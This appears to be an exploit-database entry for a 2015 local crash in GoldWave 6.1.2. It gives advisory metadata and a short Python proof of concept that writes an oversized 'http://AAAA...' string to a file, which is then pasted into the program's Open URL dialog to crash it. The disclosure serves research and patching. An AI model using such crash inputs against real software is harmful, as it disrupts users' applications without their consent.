header-logo
Suggest Exploit
vendor:
GoldWave
by:
0neb1n
7.5
CVSS
HIGH
Local Crash
119
CWE
Product Name: GoldWave
Affected Version From: 6.1.2002
Affected Version To: 6.1.2002
Patch Exists: Yes
Related CWE: N/A
CPE: a:goldwave:goldwave
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 8.1 Home KR
2015

GoldWave 6.1.2 (URL) Local Crash Exploit

GoldWave 6.1.2 is vulnerable to a local crash exploit. An attacker can create a file named 'poc.txt' and copy 'http://AAAAAAAA...' into it. When the user runs GoldWave 6.1.2 and opens the URL, the application will crash.

Mitigation:

Update to the latest version of GoldWave 6.1.2 or higher.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: GoldWave 6.1.2 (URL) Local Crash Exploit
# Date: 12-06-2015
# Exploit Author: 0neb1n
# Vendor Homepage: http://www.goldwave.com/
# Software Link: http://goldwave.com/downloads/InstallGoldWave612.exe
# Version: 6.1.2
# Tested on: Windows 8.1 Home KR
# Step 1 : Make poc.txt and copy "http://AAAAAAAA..."
# Step 2 : run GoldWave 6.1.2 -> File -> Open URl -> Paste "http://AAAAAA..."
# step 3 : Boom!!

file = "poc.txt"

data = 'http://' + '\x41' * 200000

fd = open(file, 'w')
fd.write(data)
fd.close()

print ""
print "[*] File successfully created !!"
print "[*] Author : 0neb1n"
print "[*] Mail : barcodecrow(at)gmail(dot)com"